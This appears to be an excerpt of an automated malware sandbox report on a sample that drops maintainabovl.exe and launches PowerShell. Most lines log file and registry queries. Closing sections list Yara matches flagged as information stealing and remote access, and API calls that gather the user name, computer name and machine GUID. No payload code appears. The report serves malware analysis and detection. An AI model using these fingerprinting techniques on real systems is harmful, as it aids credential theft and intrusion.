                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: NtQuerySystemInformation, Sleep, GetLocaleInfoA, GetSystemDefaultUILanguage, VerLanguageNameA, GetLongPathNameW, GetLongPathNameW, GetLongPathNameW, CreateThread, QueueUserAPC, CloseHandle, GetLastError, TerminateThread, CloseHandle, SetLastError, WaitForSingleObject, GetExitCodeThread, CloseHandle, GetLastError, GetLastError | 7_2_00401178
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01095710 cpuid | 7_2_01095710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C518964 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, GetTickCount, QueryPerformanceCounter | 0_2_00007FF64C518964
Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C512C54 GetVersion, GetModuleHandleW, GetProcAddress, ExitWindowsEx, CloseHandle | 0_2_00007FF64C512C54
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01095710 RtlAllocateHeap, GetUserNameW, RtlAllocateHeap, GetUserNameW, HeapFree, GetComputerNameW, GetComputerNameW, RtlAllocateHeap, GetComputerNameW, HeapFree | 7_2_01095710

                  Stealing of Sensitive Information

Source: Yara match | File source: 1.2.maintainabovl.exe.3d42f70.7.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d82f90.5.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.c0e0000.9.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5732 | type: MEMORYSTR
Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY

                  Remote Access Functionality

Source: Yara match | File source: 1.2.maintainabovl.exe.3d42f70.7.unpack | type: UNPACKEDPE
